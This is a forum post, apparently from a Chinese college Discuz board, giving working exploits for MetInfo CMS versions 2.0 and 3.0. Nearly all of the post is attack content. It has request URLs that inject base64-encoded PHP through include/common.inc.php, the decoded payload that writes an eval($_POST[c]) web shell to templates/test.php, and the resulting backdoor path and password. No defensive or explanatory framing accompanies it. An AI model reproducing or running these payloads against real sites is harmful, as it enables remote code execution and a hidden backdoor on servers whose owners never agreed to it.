设为首页

广西经贸职业技术学院论坛

 忘记密码
 免费注册
查看: 3460|回复: 0
打印 上一主题 下一主题

MetInfo2.0-3.0

[复制链接]
跳转到指定楼层
楼主
发表于 2010-11-5 22:20:43 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
2.0
+poc:
include/common.inc.php?$class2_all_1[0]=[base64_encode(eval php code)]

+Exploit:
/include/common.inc.php?$class2_all_1[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==
the encoded part is fputs(fopen(''../templates/test.php'',''w+''),''<?php eval($_POST[c]);?>'');
backdoor:http://site/templates/test.php                            password:c

-----------------------------------------------------------------------------------------
3.0
+POC:/include/common.inc.php?allclass[0]=[base64_encode(eval php code)]
+Exploit:
/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==
the encoded part is fputs(fopen(''../templates/test.php'',''w+''),''<?php eval($_POST[c]);?>'');

backdoor:http://site/templates/test.php                            password:c
常上飞翔,梦想飞扬!经贸是我家,建设靠大家~ 人们都说:不在大学论坛里灌过水的大学都像是没读过大学~

QQ|版主考核中心|『经贸在线』 ( 桂ICP备15001539号-2  

GMT+8, 2024-11-26 10:42

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表